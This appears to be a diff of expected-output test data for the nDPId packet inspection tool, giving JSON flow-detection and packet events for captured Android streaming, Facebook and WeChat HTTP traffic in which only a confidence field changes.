00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} 
+00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7580000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\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"} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\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"} 02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0M
jg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYxMDNkNTU4OTU2YWQwYWY2YTU2Mw=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} -01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7580000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"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"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": 
{"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7580000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 
01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKkAeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} 
